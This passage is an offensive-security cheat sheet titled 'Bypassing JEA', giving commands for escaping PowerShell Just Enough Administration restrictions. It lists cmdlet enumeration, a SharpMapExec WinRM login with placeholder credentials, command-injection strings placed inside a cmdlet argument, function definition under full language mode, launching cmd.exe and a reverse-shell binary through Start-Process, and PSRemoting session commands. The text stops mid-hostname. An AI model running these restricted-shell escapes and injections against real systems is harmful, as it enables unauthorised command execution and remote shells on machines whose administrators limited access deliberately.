Bypassing JEA #View all the commands that we have access to get-command * #View the source code of the Commands/cmdlets Get-Command -ShowCommandInfo -Name CmdLet_NAME Get-Command -ShowCommandInfo -Name Get-ChildItem #using SharpMapExec to bypass JEA or find interesting items |.\SharpMapExec.exe ntlm winrm /user:USERNAME/password:"p@ssw0RD!" /domain:steins.local /computername:10.10.10.10 Note : ExpandString & Invoke-Expression might be vulnerable to command execution #Examples of Bypasing JE A get-something -command 'Hello $([void] (Get-Item C:\))' get-something -command '$(""; ipconfig)' #If Full language mode is enabled function test() {whoami};test #Bypassing JEA if start-Process is accessible Enter-PSSession -ComputerName <Name> -ConfigurationName <Name> Start-Process cmd.exe revshell.exe Powershell Remote Access Enable-PSRemoting #uses TCP - Port 5985, 5986 for SSL. #Start a PS Session Enter-PSSession -ComputerName kurisu.st
Way to Divergence